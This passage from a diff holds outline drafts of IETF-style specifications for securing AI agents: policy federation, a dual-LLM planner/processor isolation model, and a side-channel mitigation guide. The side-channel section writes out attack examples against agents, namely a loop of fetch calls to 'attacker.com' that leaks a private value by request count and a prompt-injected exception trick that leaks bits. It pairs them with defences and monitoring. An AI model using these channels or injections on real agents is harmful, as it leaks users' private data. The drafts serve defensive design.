1. **Standard vocabulary**: should provenance types be extensible or fixed?
2. **Cross-standard alignment**: how does this relate to the W3C PROV provenance ontology?
3. **Storage**: who is responsible for storing provenance long-term? Each agent? A shared ledger?
4. **Legal implications**: does provenance tracking create liability for the organizations that produce it?

## 10. References

- Debenedetti et al. "Defeating Prompt Injections by Design." arXiv:2503.18813, 2025.
- Denning. "A lattice model of secure information flow." CACM, 1976.
- W3C PROV: Provenance Data Model. W3C Recommendation, 2013.
- draft-nennemann-wimse-ect (Execution Context Tokens)
- draft-ietf-wimse-arch (WIMSE architecture)
@@ -0,0 +1,300 @@

---
title: "Security Policy Negotiation and Federation for AI Agent Ecosystems"
draft_name: draft-nennemann-ai-agent-policy-federation-00
intended_wg: SECDISPATCH or OAUTH
status: outline
gaps_addressed: [83, 87, 90]
camel_sections: [5.2, 9.1]
date: 2026-03-09
---

# Security Policy Negotiation and Federation for AI Agent Ecosystems

## 1. Problem Statement

CaMeL demonstrates that security policies — rules governing what data can flow to which tools — are essential for safe AI agent operation. However, CaMeL defines policies at the **single-engine level**. In real multi-organization agent ecosystems:

- **Different organizations have different policies** (Gap #83): Org A's email policy may allow sharing with partners; Org B's may not
- **Identity and trust models differ across domains** (Gap #87): IoT, web, telecom, and industrial agents use incompatible authentication mechanisms
- **Agents cannot discover each other's capabilities or constraints** (Gap #90): when agents collaborate, they have no standard way to negotiate which data flows are permitted

This creates a fragmented security landscape in which agents either over-restrict (breaking utility) or under-restrict (creating vulnerabilities).

## 2. Scope

This document defines:

1. A **policy publication format** for organizations to declare their agent security policies
2. A **policy negotiation protocol** for agents to agree on data handling rules before collaboration
3. A **policy federation framework** for resolving conflicts between policies from different trust domains
4. **Liability attribution** based on policy decisions

## 3. Policy Publication

### 3.1 Organization Policy Document

Organizations publish their agent security policies at a well-known endpoint:

```
GET /.well-known/ai-agent-policies HTTP/1.1
Host: org1.example
```

Response:

```json
{
  "policies:version": "1.0",
  "policies:org": "org1.example",
  "policies:effective_date": "2026-01-01",
  "policies:tools": {
    "send_email": {
      "policy_ref": "https://org1.example/policies/send-email-v2",
      "summary": "Recipients must be in readers set or user-approved",
      "strictness": "high"
    },
    "cloud_storage_read": {
      "policy_ref": "https://org1.example/policies/storage-read-v1",
      "summary": "Outputs tagged with document access list as readers",
      "strictness": "medium"
    }
  },
  "policies:global_rules": [
    {
      "rule": "no_pii_to_external",
      "description": "PII-classified data never flows to tools hosted outside org1.example",
      "enforcement": "mandatory"
    }
  ],
  "policies:trust_domains": [
    {
      "domain": "org2.example",
      "trust_level": "partner",
      "policy_overrides": []
    }
  ],
  "policies:signature": "<signed by org1.example>"
}
```

### 3.2 Policy Detail Document

Each referenced policy provides the full enforcement rules:

```json
{
  "policy:id": "send-email-v2",
  "policy:tool": "send_email",
  "policy:version": "2.0",
  "policy:rules": [
    {
      "id": "r1",
      "check": "readers_include_recipient",
      "on_fail": "deny_with_user_prompt",
      "exceptions": [
        {
          "condition": "recipient_domain == org1.example",
          "action": "allow",
          "rationale": "Internal recipients always allowed"
        }
      ]
    }
  ],
  "policy:required_capabilities": ["cap:source_tracking", "cap:reader_labels"],
  "policy:compatible_with": ["camel-v1", "progent-v1"]
}
```

## 4. Policy Negotiation Protocol

### 4.1 Pre-Collaboration Handshake

Before two agents exchange data, they negotiate compatible policies:

```
Agent A (org1.example)                 Agent B (org2.example)
        │                                      │
        │──── PolicyOffer ───────────────────► │
        │     {my_policies, required_caps}     │
        │                                      │
        │◄──── PolicyResponse ──────────────── │
        │     {your_policies, compatible,      │
        │      proposed_merged_policy}         │
        │                                      │
        │──── PolicyAccept/Reject ───────────► │
        │     {accepted_policy_id}             │
        │                                      │
        │◄═══ Data exchange begins ══════════► │
```

### 4.2 Policy Compatibility Check

Two policies are compatible if (see the sketch after this list):

1. Both support the required capability types (provenance, readers, etc.)
2. No mandatory rule from either side is contradicted
3. The intersection of allowed data flows is non-empty (some useful work can be done)
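
A non-normative sketch of that test over pre-extracted views of two policy documents; `caps`, `required_caps`, `mandatory`, `forbidden`, and `flows` are illustrative set-valued summaries, not fields of the §3.1 format:

```python
def compatible(a: dict, b: dict) -> bool:
    """Return True if two summarized policy views can collaborate."""
    # 1. Each side supports the capability types the other requires.
    if not (a["required_caps"] <= b["caps"] and b["required_caps"] <= a["caps"]):
        return False
    # 2. No mandatory rule on one side is explicitly forbidden by the other.
    if a["mandatory"] & b["forbidden"] or b["mandatory"] & a["forbidden"]:
        return False
    # 3. Some permitted data flow exists on both sides.
    return bool(a["flows"] & b["flows"])
```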

### 4.3 Merged Policy

When policies differ, the negotiation produces a **merged policy**:

```json
{
  "merged_policy:id": "merged-a1b2",
  "merged_policy:participants": ["org1.example", "org2.example"],
  "merged_policy:rules": [
    {
      "source": "org1.example",
      "rule": "no_pii_to_external",
      "enforcement": "mandatory",
      "applies_to": "data originating from org1"
    },
    {
      "source": "org2.example",
      "rule": "recipients_must_be_authenticated",
      "enforcement": "mandatory",
      "applies_to": "data originating from org2"
    }
  ],
  "merged_policy:conflict_resolution": "most_restrictive_wins",
  "merged_policy:valid_until": "2026-03-09T15:30:00Z"
}
```

## 5. Policy Federation Framework

### 5.1 Conflict Resolution Strategies

| Strategy | Description | Use Case |
|----------|-------------|----------|
| `most_restrictive_wins` | Apply the stricter of conflicting rules | Default for cross-org |
| `origin_policy_governs` | Data follows the policy of the org that produced it | Data sovereignty |
| `destination_policy_governs` | The receiving org's policy applies | Regulatory compliance |
| `explicit_consent` | The user must approve any flow that either policy would restrict | High-security |
| `arbiter_decides` | A trusted third party resolves conflicts | Multi-party disputes |

### 5.2 Trust Domain Mapping

*Addresses Gap #87: Cross-domain identity federation.*

Different domains use different identity systems. The federation framework provides translation:

```json
{
  "trust_mapping:version": "1.0",
  "trust_mapping:domains": {
    "web": {
      "identity_type": "oauth2_client_id",
      "reader_format": "email",
      "example": "user@org1.example"
    },
    "iot": {
      "identity_type": "x509_device_cert",
      "reader_format": "device_uri",
      "example": "urn:device:sensor-42"
    },
    "telecom": {
      "identity_type": "sim_identity",
      "reader_format": "msisdn",
      "example": "+491234567890"
    }
  },
  "trust_mapping:equivalences": [
    {
      "assertion": "user@org1.example ≡ urn:device:sensor-42",
      "attested_by": "org1.example",
      "valid_until": "2026-12-31"
    }
  ]
}
```

## 6. Liability Attribution

*Addresses Gap #83: Cross-organizational AI agent liability.*

### 6.1 Policy Decision Log

Every policy evaluation is logged with attribution:

```json
{
  "liability:event_id": "evt-9c3a2d",
  "liability:action": "send_email",
  "liability:data_provenance": "prov-8c3a2d",
  "liability:policy_evaluated": "merged-a1b2",
  "liability:decision": "allowed",
  "liability:deciding_rule": {
    "source": "org1.example",
    "rule_id": "r1",
    "rationale": "Recipient in readers set per org1 policy"
  },
  "liability:responsible_party": "org1.example",
  "liability:timestamp": "2026-03-09T14:35:00Z"
}
```

### 6.2 Liability Chain

When harm occurs, the liability chain is traceable:

1. **Which policy allowed the action?** → the merged policy and the specific rule
2. **Which organization's rule was decisive?** → the `deciding_rule.source`
3. **Was the policy correctly evaluated?** → compare the logged capabilities against the rule requirements
4. **Was the provenance accurate?** → verify the provenance attestation signatures

### 6.3 Liability Models

| Model | Description | Applicability |
|-------|-------------|---------------|
| `origin_liable` | The org that produced the data is liable | Data quality issues |
| `policy_owner_liable` | The org whose policy allowed the action is liable | Policy defects |
| `executor_liable` | The agent that executed the tool is liable | Execution errors |
| `shared_liability` | All participants share liability proportionally | Default for partnerships |
| `insurance_model` | Pre-negotiated insurance covers harm | Enterprise deployments |

## 7. Integration with Capability Negotiation

*Addresses Gap #90: AI agent capability negotiation protocols.*

Policy federation naturally extends to capability negotiation:

```json
{
  "capability_offer": {
    "agent_id": "agent-a@org1.example",
    "capabilities": [
      {"type": "email_send", "restrictions": ["org1.example domains only"]},
      {"type": "file_read", "restrictions": ["user-owned files only"]},
      {"type": "llm_query", "restrictions": ["no PII in prompts"]}
    ],
    "required_from_peer": [
      {"type": "provenance_tracking", "min_version": "1.0"},
      {"type": "reader_labels", "min_version": "1.0"}
    ]
  }
}
```

## 8. Security Considerations

- Policy documents must be integrity-protected and versioned
- Policy negotiation must be authenticated (mutual TLS, WIMSE tokens)
- Cached policy decisions should be invalidated when policies change
- Policy documents themselves can leak an organization's security posture — access control on `/.well-known/ai-agent-policies` may be warranted

## 9. Open Questions

1. **Policy language expressiveness**: JSON rules vs. Rego/OPA vs. Python (CaMeL's approach) — standardize one, or allow pluggable languages?
2. **Dynamic renegotiation**: can policies be renegotiated mid-conversation?
3. **Regulatory mapping**: how do GDPR, CCPA, and similar regulations map to policy rules?
4. **Scalability**: with N organizations, pairwise policy negotiation is O(N²) — are federation hierarchies needed?

## 10. References

- Debenedetti et al. "Defeating Prompt Injections by Design." arXiv:2503.18813, 2025.
- RFC 9635 (GNAP: Grant Negotiation and Authorization Protocol)
- RFC 6749 (The OAuth 2.0 Authorization Framework)
- draft-ietf-wimse-arch (WIMSE architecture)
- Open Policy Agent (OPA) / Rego policy language
@@ -0,0 +1,273 @@

---
title: "Privileged/Quarantined Execution Model for Agentic AI Systems"
draft_name: draft-nennemann-ai-agent-dual-execution-00
intended_wg: SECDISPATCH → new WG
status: outline
gaps_addressed: [89, 92, 94]
camel_sections: [5.1]
date: 2026-03-09
---

# Privileged/Quarantined Execution Model for Agentic AI Systems

## 1. Problem Statement

Current AI agent architectures use a **single LLM** that simultaneously:

- Reads the user's trusted instructions
- Processes untrusted external data (emails, web pages, documents)
- Plans which tools to call
- Decides what arguments to pass

This architectural conflation is the root cause of prompt injection vulnerabilities. An adversary who can influence the external data can influence the plan and the arguments — because the same model processes both.

CaMeL (Debenedetti et al., 2025) implements the first concrete **Dual-LLM architecture**, in which a Privileged LLM (P-LLM) handles planning and a Quarantined LLM (Q-LLM) handles untrusted data parsing, with strict isolation between them. This separation is analogous to kernel/user-space separation in operating systems.

No IETF standard defines roles, isolation requirements, or behavioral contracts for multi-component AI agent architectures.

## 2. Scope

This document defines:

1. **Execution roles** for AI agent components (Privileged, Quarantined, Orchestrator)
2. **Isolation requirements** between roles
3. **Behavioral contracts** specifying what each role can and cannot do
4. **Communication channels** between roles with integrity guarantees
5. A **role negotiation protocol** for multi-agent systems

## 3. Execution Roles

### 3.1 Role Definitions

| Role | CaMeL Term | Privileges | Restrictions |
|------|-----------|-----------|-------------|
| **Planner** | Privileged LLM (P-LLM) | Sees user query; generates execution plan; selects tools | Never sees tool outputs or external data content |
| **Processor** | Quarantined LLM (Q-LLM) | Parses unstructured data into structured format | No tool access; cannot communicate arbitrary messages to the Planner |
| **Orchestrator** | CaMeL interpreter | Executes plan; maintains data flow graph; enforces policies | Deterministic; no LLM reasoning |
| **User** | Human | Approves policy violations; provides trusted input | — |

### 3.2 Role Isolation Matrix

```
Can see:        User Query   Tool Outputs   Plan      External Data
Planner             ✓             ✗         ✓ (own)        ✗
Processor           ✗             ✗         ✗              ✓
Orchestrator        ✓             ✓         ✓              ✓ (metadata only)
User                ✓             ✓         ✓              ✓
```

The critical isolation properties: **the Planner never sees external data content, and the Processor never has tool access.**

### 3.3 Communication Constraints

```
User ──(trusted query)──► Planner
Planner ──(plan code)──► Orchestrator
Orchestrator ──(tool calls)──► Tools
Tools ──(results)──► Orchestrator
Orchestrator ──(structured data + schema)──► Processor
Processor ──(structured output OR NotEnoughInfo)──► Orchestrator
Orchestrator ──(error type only, no content)──► Planner   [on error]
```

The Processor can communicate back only (the schema gate is sketched after this list):

1. Structured data matching a Planner-specified schema (Pydantic-style)
2. A `NotEnoughInformation` boolean signal (no free-text explanation — that would be an injection vector)
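
A sketch of that gate using a Pydantic-style schema, as the text suggests; the schema and field names are hypothetical:

```python
from pydantic import BaseModel

class ExtractedContact(BaseModel):
    """Planner-specified schema the Processor's output must conform to."""
    email: str
    doc_name: str

def gate_processor_output(raw_output: str) -> ExtractedContact | None:
    """Admit only schema-conformant output; anything else collapses to the
    NotEnoughInformation signal (None here), never free text."""
    try:
        return ExtractedContact.model_validate_json(raw_output)
    except Exception:
        return None  # no error details cross the quarantine boundary
```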

## 4. Behavioral Contracts

*Addresses Gap #94: AI agent behavioral specification languages.*

### 4.1 Contract Format

Each role has a formal behavioral contract:

```json
{
  "contract:version": "1.0",
  "contract:role": "planner",
  "contract:invariants": [
    {
      "id": "inv-1",
      "description": "Planner never receives tool output content",
      "formal": "∀ step ∈ plan: planner.context ∩ tool_outputs = ∅",
      "enforcement": "orchestrator_enforced"
    },
    {
      "id": "inv-2",
      "description": "Plan is generated solely from user query and tool signatures",
      "formal": "plan = f(user_query, tool_signatures)",
      "enforcement": "architectural"
    },
    {
      "id": "inv-3",
      "description": "Planner output is deterministic code, not free-form text to tools",
      "formal": "planner.output ∈ restricted_python_subset",
      "enforcement": "parser_enforced"
    }
  ],
  "contract:capabilities": [
    "generate_plan",
    "select_tools",
    "define_schemas_for_processor",
    "call_print_for_user_output"
  ],
  "contract:prohibited": [
    "access_tool_outputs",
    "access_external_data",
    "communicate_with_processor_directly",
    "modify_orchestrator_state"
  ]
}
```

### 4.2 Processor Contract

```json
{
  "contract:version": "1.0",
  "contract:role": "processor",
  "contract:invariants": [
    {
      "id": "inv-1",
      "description": "Processor has no tool-calling capability",
      "formal": "processor.tools = ∅",
      "enforcement": "architectural"
    },
    {
      "id": "inv-2",
      "description": "Processor output conforms to Planner-specified schema",
      "formal": "processor.output ∈ schema(planner.request)",
      "enforcement": "schema_validation"
    },
    {
      "id": "inv-3",
      "description": "Processor cannot send free-text to Planner",
      "formal": "processor → planner: only {structured_data, NotEnoughInfo}",
      "enforcement": "orchestrator_enforced"
    }
  ],
  "contract:capabilities": [
    "parse_unstructured_to_structured",
    "signal_insufficient_information"
  ],
  "contract:prohibited": [
    "call_tools",
    "see_user_query",
    "send_arbitrary_text_to_planner",
    "access_other_tool_outputs"
  ]
}
```

### 4.3 Contract Verification

Contracts can be verified at three levels:

1. **Architectural**: enforced by system design (the Processor literally has no tool access)
2. **Parser-enforced**: Planner output is parsed and validated against a restricted grammar
3. **Runtime-monitored**: the Orchestrator checks invariants at each step

## 5. Practical Considerations

### 5.1 Model Selection

CaMeL shows that the Processor role can use a **cheaper, weaker model**:

- P-LLM: Claude Sonnet, GPT-4o, o3 (needs strong reasoning)
- Q-LLM: Claude Haiku, GPT-4o-mini (only needs structured extraction)

Using a local model for the Processor also improves **privacy**: the P-LLM provider never sees tool outputs (which may contain sensitive data).

### 5.2 Error Handling

When the Processor encounters an error:

1. The Processor signals `NotEnoughInformation` (a boolean, with no details)
2. The Orchestrator reports to the Planner: error type + location (but **not** the data content)
3. The Planner generates alternative code
4. Retry up to N times (CaMeL uses N = 10)

Important: error messages derived from untrusted data must be **redacted** before reaching the Planner, as they could contain prompt injections.
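
A non-normative sketch of this retry-with-redaction loop; the `planner` and `orchestrator` objects are assumed implementation hooks:

```python
MAX_RETRIES = 10  # CaMeL uses N = 10

class ProcessorError(Exception):
    """Raised by the orchestrator; carries only the failing step id."""
    def __init__(self, step_id: str):
        super().__init__(step_id)
        self.step_id = step_id

def plan_and_execute(user_query: str, planner, orchestrator):
    feedback = None
    for _ in range(MAX_RETRIES):
        code = planner.generate(user_query, error=feedback)
        try:
            return orchestrator.run(code)
        except ProcessorError as exc:
            # Only the error type and step reach the Planner; the data content
            # is withheld, since it may carry a prompt injection.
            feedback = {"error_type": type(exc).__name__, "step": exc.step_id}
    raise RuntimeError("plan failed after maximum retries")
```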
|
||||
|
||||
### 5.3 Limitations
|
||||
|
||||
CaML identifies inherent limitations of the Dual-LLM pattern:
|
||||
|
||||
- **"Data requires action" failure**: when the required actions depend on untrusted data content, the Planner cannot plan without seeing the data
|
||||
- **Not enough context for Processor**: when the Processor needs information that wasn't passed to it, and cannot request it (that would be a communication channel)
|
||||
|
||||
## 6. Multi-Agent Role Mapping
|
||||
|
||||
*Addresses Gap #89: Adversarial AI agent detection in real-time.*
|
||||
|
||||
In multi-agent systems, each agent declares its role:
|
||||
|
||||
```json
|
||||
{
|
||||
"agent:id": "agent-a@org1.example",
|
||||
"agent:role_declaration": {
|
||||
"architecture": "dual_llm",
|
||||
"planner": {
|
||||
"model_family": "claude-sonnet",
|
||||
"contract_ref": "https://org1.example/contracts/planner-v2"
|
||||
},
|
||||
"processor": {
|
||||
"model_family": "claude-haiku",
|
||||
"contract_ref": "https://org1.example/contracts/processor-v1"
|
||||
},
|
||||
"orchestrator": {
|
||||
"type": "deterministic_interpreter",
|
||||
"contract_ref": "https://org1.example/contracts/orchestrator-v1"
|
||||
}
|
||||
},
|
||||
"agent:attestation": "<signed by org1.example>"
|
||||
}
|
||||
```
|
||||
|
||||
Peer agents can verify:
|
||||
- The counterpart uses a recognized execution model
|
||||
- Role contracts meet minimum security requirements
|
||||
- Attestations are valid and current
|
||||
|
||||
### 6.1 Detecting Adversarial Agents

An agent that violates its declared contracts can be detected by:

1. **Behavioral anomaly**: actions inconsistent with the declared role contracts
2. **Provenance inconsistency**: data claimed as "trusted" whose provenance chain shows untrusted origins
3. **Policy violation patterns**: repeated attempts to bypass policies suggest compromise

## 7. Ethical Conflict Resolution

*Partially addresses Gap #92: AI agent ethical decision conflict resolution.*

When agents with different ethical frameworks collaborate:

1. Each agent's Planner operates under its organization's ethical guidelines (encoded in its system prompt)
2. The Orchestrator enforces policy-level ethical constraints
3. When ethical conflicts arise at data exchange boundaries, the Policy Federation framework (Draft 4) handles resolution
4. The execution model ensures ethical guidelines cannot be overridden by injected data

This is a partial solution: the execution model prevents **external manipulation** of ethical decisions, but it does not resolve **genuine disagreements** between organizations' ethical frameworks.

## 8. Security Considerations

- Role isolation must be enforced architecturally, not merely by prompting
- The Orchestrator is the most critical component: if it is compromised, all guarantees fail
- Model selection for the Processor should consider adversarial robustness, not just capability
- Role declarations should be verified, not merely trusted

## 9. Open Questions

1. **Standardizing the restricted language**: CaML uses a Python subset. Should the standard mandate a specific language or allow alternatives?
2. **Role granularity**: are Planner/Processor/Orchestrator sufficient, or are more fine-grained roles needed?
3. **Recursive planning**: when a Planner must plan based on intermediate results, how is isolation maintained?
4. **Multi-turn conversations**: how do roles work across conversation turns as context accumulates?

## 10. References

- Debenedetti et al. "Defeating Prompt Injections by Design." arXiv:2503.18813, 2025.
- Willison. "The Dual LLM Pattern for Building AI Assistants That Can Resist Prompt Injection." 2023.
- Wu et al. "IsolateGPT: An Execution Isolation Architecture for LLM-Based Agentic Systems." NDSS, 2025.
- Shi et al. "Progent: Programmable Privilege Control for LLM Agents." arXiv:2504.11703, 2025.

@@ -0,0 +1,245 @@
---
title: "Side-Channel Mitigation Framework for AI Agent Interactions"
draft_name: draft-nennemann-ai-agent-side-channels-00
intended_wg: SECDISPATCH (BCP)
status: outline
gaps_addressed: [89, 93]
camel_sections: [7]
document_type: BCP (Best Current Practice)
date: 2026-03-09
---

# Side-Channel Mitigation Framework for AI Agent Interactions

## 1. Problem Statement

Even when AI agent systems implement strong security measures (capability-based policies, control/data flow integrity, Privileged/Quarantined execution), **side-channel attacks** can still leak private data. CaML (Debenedetti et al., 2025, §7) identifies three concrete side-channel attack classes against agent systems:

1. **External resource inference**: the adversary causes the agent to make requests to an attacker-controlled server, where the number or pattern of requests leaks private information
2. **Exception-based bit leaking**: the adversary triggers conditional exceptions that reveal one bit of private data per exception
3. **Timing side-channels**: the adversary infers private values from differences in execution timing

These are not theoretical: CaML demonstrates working exploits against Claude 3.5 Sonnet and o3-mini in its evaluation. Side-channel attacks are notoriously difficult to eliminate completely, but careful system design can reduce their impact.

This document is a **Best Current Practice (BCP)** guide for mitigating side-channel risks in AI agent systems.

## 2. Scope

This document provides:

1. A **taxonomy of side-channel risks** specific to AI agent systems
2. **Mitigation strategies** for each risk category
3. **Tool API design guidelines** that minimize side-channel exposure
4. **Monitoring patterns** for detecting side-channel exploitation
5. **STRICT vs. NORMAL mode** recommendations

## 3. Side-Channel Taxonomy

### 3.1 External Resource Inference

**Attack**: agent code iterates over a private value (e.g., `for i in range(private_var): fetch("attacker.com/cat.jpg")`). The attacker counts the requests to infer the private value.

**CaML context**: in NORMAL mode, the loop body does not inherit dependencies from the loop condition. In STRICT mode, a `fetch()` inside the loop inherits the dependency on `private_var`, so policies can block it.

**Bandwidth**: up to `log₂(max_value)` bits per interaction (more with range-based inference).

```
Attacker's Server
      │
      │  GET /cat.jpg ×10   ← private_var = 10
      │  GET /cat.jpg ×20   ← private_var = 20
      │
      └── attacker infers private_var by counting requests
```

### 3.2 Exception-Based Bit Leaking

**Attack**: the adversary prompt-injects the Processor (Q-LLM) so that it returns an output that conditionally triggers an exception. If the exception halts execution before a state-changing tool call, the attacker observes whether the tool was called, leaking one bit.

**CaML context**: the Q-LLM can be influenced to return a value that causes an `IndexError` (e.g., returning 9999999 if a condition on private data holds, which then indexes past the end of a list).

```python
# Attack: leak whether private_var == 10
index = query_ai_assistant(
    f"If '{private_var}' is 10, return 9999999, else 0", int)
l = [1, 2, 3]
l[index]  # IndexError if private_var == 10
# ADVERSARY-OBSERVABLE ACTION below:
send_email(...)  # only executes if no exception was raised
```

**Bandwidth**: 1 bit per exception (was the subsequent action observed or not?).

### 3.3 Timing Side-Channels

**Attack**: agent execution time depends on private data. For example, if `time.sleep(private_var)` is expressible in the plan language, the attacker measures response time directly.

**CaML context**: CaML's restricted Python subset does not include `time`, but other timing variations (e.g., different code paths for different private values) may still be exploitable.

**Bandwidth**: depends on timing precision; generally low but non-zero.

### 3.4 Agent-Specific Side Channels (Beyond CaML)

| Channel | Attack Vector | Bandwidth |
|---------|--------------|-----------|
| **Token usage** | Private data influences response length → observable token count | Medium |
| **Tool selection pattern** | Which tools are called reveals information about private data | Medium |
| **Error message content** | Error details leak through supposedly sanitized channels | High |
| **Model confidence** | Probability distributions in structured output leak information | Low |
| **Resource consumption** | CPU/memory usage patterns depend on private data | Low |

## 4. Mitigation Strategies

### 4.1 STRICT Mode Execution

**Recommendation: use STRICT mode for all security-sensitive agent operations.**

In STRICT mode:

- All statements inside `if`/`for`/`while` blocks inherit dependencies from the condition or iterator
- A `fetch()` inside `for i in range(private_var)` therefore carries `private_var` in its dependency graph
- Security policies can detect and block the side channel (see the sketch below)

**Trade-off**: STRICT mode reduces utility. CaML reports that policy triggering rates rise from 33.87% (NORMAL) to 53.23% (STRICT) in benign scenarios. Recommendation: use STRICT mode by default, and allow NORMAL mode only for explicitly low-sensitivity operations.

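A minimal sketch of the dependency rule, not CaML's actual interpreter: each value carries a set of source tags, and in STRICT mode every expression evaluated inside a control block also absorbs the tags of the controlling condition. The tag names are invented for illustration:

```python
# Illustrative taint propagation for STRICT vs. NORMAL mode.
# "Dependencies" are just sets of source tags attached to values.
def run_loop(private_var_deps: set[str], mode: str) -> set[str]:
    """Return the dependency set attached to a fetch() made inside
    `for i in range(private_var): fetch(...)`."""
    fetch_deps = {"planner"}        # direct data deps of the call itself
    if mode == "STRICT":
        # Control dependency: the loop iterator taints the loop body.
        fetch_deps |= private_var_deps
    return fetch_deps

deps = run_loop({"tool:read_inbox"}, mode="STRICT")
# A policy like "no external requests depending on inbox data" now fires:
assert "tool:read_inbox" in deps

deps = run_loop({"tool:read_inbox"}, mode="NORMAL")
assert "tool:read_inbox" not in deps   # the side channel goes unnoticed
```
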
### 4.2 Exception Handling Hardening

**Recommendation: use error-value types instead of exceptions for data-dependent operations.**

Exceptions create side channels because they halt execution. Instead:

```python
# VULNERABLE: the exception leaks information
try:
    result = risky_operation(private_data)
    send_email(result)  # not reached if an exception is raised
except Exception:
    pass  # attacker observes: was the email sent?

# MITIGATED: an error value preserves the execution flow
result = risky_operation(private_data)  # returns a Result type
if result.is_ok():
    send_email(result.value)  # both branches execute deterministically
else:
    send_email(default_value)  # same tool call either way
```

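A minimal `Result` type that would make the mitigated pattern above concrete; this is a sketch, not an API from CaML or any particular framework:

```python
# Minimal error-value type: failures become ordinary values, so control
# flow (and the observable tool-call pattern) is identical either way.
from dataclasses import dataclass
from typing import Generic, TypeVar

T = TypeVar("T")

@dataclass
class Result(Generic[T]):
    value: T | None = None
    error: str | None = None   # redacted error *category*, never raw text

    def is_ok(self) -> bool:
        return self.error is None

def risky_operation(data: str) -> Result[str]:
    try:
        return Result(value=data.upper())          # stand-in for real work
    except Exception as exc:
        return Result(error=type(exc).__name__)    # category only
```
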
Agent frameworks SHOULD:

- Use `Result`/`Either` types instead of exceptions for Processor outputs
- Ensure the success and failure paths make the same external observations
- Redact exception messages before they reach the Planner

### 4.3 Constant-Pattern Tool Calls

**Recommendation: where feasible, make tool call patterns independent of private data.**

- Avoid data-dependent loops that make external calls
- Use batch operations instead of per-item calls
- Pad tool call sequences to a fixed length for sensitive operations (sketched below)

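A minimal sketch of fixed-length padding; `fetch`, the padding budget, and the no-op URL are hypothetical placeholders:

```python
# Pad a data-dependent call sequence to a fixed length so the observable
# number of requests no longer reveals len(items). Illustrative only.
FIXED_CALLS = 16  # chosen upper bound for the sensitive operation

def fetch_all_padded(items: list[str], fetch) -> list:
    if len(items) > FIXED_CALLS:
        raise ValueError("batch exceeds padding budget")
    results = [fetch(url) for url in items]
    # Dummy requests to a constant, innocuous endpoint fill the gap.
    for _ in range(FIXED_CALLS - len(items)):
        fetch("https://gateway.internal/noop")  # hypothetical no-op URL
    return results
```
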
### 4.4 External Request Restrictions

**Recommendation: restrict which external endpoints agents can contact.**

- Allowlist approved external domains
- Proxy all external requests through a controlled gateway (sketched below)
- Rate-limit external requests per agent session
- Log all external requests for anomaly detection

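A minimal sketch of the gateway-side check combining allowlisting, per-session rate limiting, and logging; the domain list and limits are arbitrary example values:

```python
# Hypothetical egress gateway check: allowlist + per-session rate limit + log.
import logging
from collections import Counter
from urllib.parse import urlparse

ALLOWED_DOMAINS = {"api.example.com", "docs.example.org"}  # example allowlist
MAX_REQUESTS_PER_SESSION = 50                              # example limit

_session_counts: Counter[str] = Counter()
log = logging.getLogger("egress")

def allow_request(session_id: str, url: str) -> bool:
    host = urlparse(url).hostname or ""
    log.info("egress session=%s host=%s", session_id, host)  # anomaly feed
    if host not in ALLOWED_DOMAINS:
        return False
    _session_counts[session_id] += 1
    return _session_counts[session_id] <= MAX_REQUESTS_PER_SESSION
```
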
## 5. Tool API Design Guidelines

Tool developers SHOULD design APIs that minimize side-channel exposure:

### 5.1 Do

- Return consistent response structures regardless of input
- Use fixed-size responses where possible
- Include provenance metadata in all outputs
- Document the trust level of each output field (which fields are public, which are private)

### 5.2 Don't

- Return variable-length arrays that depend on private data in observable ways
- Include internal identifiers in error messages
- Let response timing depend on input sensitivity
- Expose iteration counts or batch sizes in responses

### 5.3 Tool Capability Annotations

Tools SHOULD declare their side-channel properties:

```json
{
  "tool:name": "send_email",
  "tool:side_channel_properties": {
    "makes_external_requests": true,
    "timing_dependent": false,
    "error_messages_may_leak": true,
    "observable_by_third_parties": true
  },
  "tool:recommended_mode": "STRICT"
}
```

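Orchestrators could consume these annotations to pick an execution mode per plan. A minimal sketch, with field names taken from the JSON above and everything else hypothetical:

```python
# Hypothetical: derive the execution mode for a plan from the declared
# side-channel properties of the tools it uses.
def select_mode(tool_annotations: list[dict]) -> str:
    for tool in tool_annotations:
        props = tool.get("tool:side_channel_properties", {})
        if (tool.get("tool:recommended_mode") == "STRICT"
                or props.get("makes_external_requests")
                or props.get("observable_by_third_parties")):
            return "STRICT"  # any risky tool forces the stricter mode
    return "NORMAL"

send_email = {
    "tool:name": "send_email",
    "tool:side_channel_properties": {"makes_external_requests": True},
    "tool:recommended_mode": "STRICT",
}
assert select_mode([send_email]) == "STRICT"
```
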
## 6. Monitoring Patterns

### 6.1 Anomaly Detection Signals

| Signal | Potential Attack | Action |
|--------|-----------------|--------|
| Repeated requests to the same external URL | External resource inference | Rate limit + alert |
| Unusually high exception rate | Exception-based bit leaking | Halt + review |
| Execution time variance above threshold | Timing side-channel | Log + investigate |
| Tool call pattern differs from plan | Control flow manipulation | Emergency halt |
| Same agent repeatedly hitting policy denials | Probing attack | Throttle + alert |

### 6.2 Monitoring Architecture

```
Agent Execution
      │
      ├──► Side-Channel Monitor
      │      ├── Request pattern analyzer
      │      ├── Exception rate tracker
      │      ├── Timing variance detector
      │      └── Tool call pattern validator
      │             │
      │             ▼
      │      Alert / Halt Decision
      │
      ▼
Normal execution continues (if no anomaly)
```

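A minimal sketch of one monitor component, the exception rate tracker; the window size and threshold are arbitrary illustration values, not recommendations:

```python
# Hypothetical exception-rate tracker: flags sessions whose recent
# exception rate suggests exception-based bit leaking (§3.2).
from collections import deque

class ExceptionRateTracker:
    def __init__(self, window: int = 50, threshold: float = 0.2):
        self.window = deque(maxlen=window)  # True = step raised an exception
        self.threshold = threshold

    def record(self, raised_exception: bool) -> None:
        self.window.append(raised_exception)

    def anomalous(self) -> bool:
        if len(self.window) < self.window.maxlen:
            return False  # not enough data yet
        rate = sum(self.window) / len(self.window)
        return rate > self.threshold  # e.g. >20% of recent steps raised

# Usage: the Orchestrator calls record() per step and escalates to
# "halt + review" whenever anomalous() returns True.
```
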
## 7. Relationship to Other Drafts

| Draft | Side-Channel Relevance |
|-------|----------------------|
| Draft 1 (Capabilities) | Capability metadata enables the policy checks that detect side channels |
| Draft 2 (Flow Integrity) | STRICT-mode DFG tracking is the primary side-channel mitigation |
| Draft 3 (Provenance) | Provenance metadata can itself be a side channel and needs protection |
| Draft 4 (Policy Federation) | Policy denial patterns across organizations can leak information |
| Draft 5 (Execution Model) | The isolation architecture is the first line of defense |

## 8. Security Considerations

This entire document is about security. Key meta-considerations:

- Side-channel mitigation is **defense in depth**: no single measure eliminates all channels
- The trade-off between security and utility is fundamental; complete side-channel elimination would make agents unusable
- New side channels will be discovered as agent systems evolve, so this BCP should be updated regularly
- Side-channel monitoring itself can create privacy issues (it logs all agent interactions)

## 9. Open Questions

